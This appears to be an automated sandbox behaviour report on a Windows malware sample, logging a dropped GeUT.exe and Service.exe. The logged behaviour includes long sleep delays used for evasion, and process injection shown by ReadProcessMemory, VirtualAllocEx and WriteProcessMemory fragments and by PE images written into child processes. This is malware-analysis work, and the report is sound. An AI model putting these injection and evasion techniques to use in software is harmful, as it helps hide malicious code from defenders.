Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: C90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 27F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2550000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: AE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 25D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 45D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 1870000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 32E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 3220000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2CC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2E40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 4E40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: FD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2810000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: FD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: FA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2990000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 27D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 880000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2400000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 4400000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2900000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2AE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2930000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: AF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2890000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 4890000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2C20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2E50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2CA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: E10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 28A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 48A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: C10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 25A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 45A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 1230000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2EE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2E20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 1420000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2F70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 4F70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: C00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2980000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2790000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2FF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 3170000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 5170000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 1710000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 3160000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2F40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2C30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2DB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 4DB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2EB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 3080000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 12F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2DE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2BD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: B90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 27D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2550000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 24F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2620000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 4620000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2DC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 3080000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 5080000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: CE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2650000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: EE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2C80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 1180000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 1650000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 3240000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 5240000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Window / User API: threadDelayed 462
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Window / User API: threadDelayed 9010
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 1036 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5704 Thread sleep time: -339000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5704 Thread sleep time: -9010000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 1020 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5708 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 6104 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 3704 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 4544 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5932 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5664 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 2612 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5144 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5588 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5192 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5808 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 4232 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5764 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5684 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 992 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5156 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 6284 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 1408 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 4600 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 1924 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 3384 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 4856 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 3000 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: GeUT.exe, 00000003.00000002.3408146583.0000000000A6B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe File created: GeUT.exe.0.dr
Source: 2.2.GeUT.exe.2834784.2.raw.unpack, reflect.cs Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: 2.2.GeUT.exe.2834784.2.raw.unpack, reflect.cs Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
Source: 2.2.GeUT.exe.2834784.2.raw.unpack, reflect.cs Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 790000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 390000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory written: C:\Users\user\AppData\Local\Temp\GeUT.exe base: 500000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 370000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Service.exe Memory written: C:\Users\user\AppData\Roaming\Service.exe base: 770000 value starts with: 4D5A
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
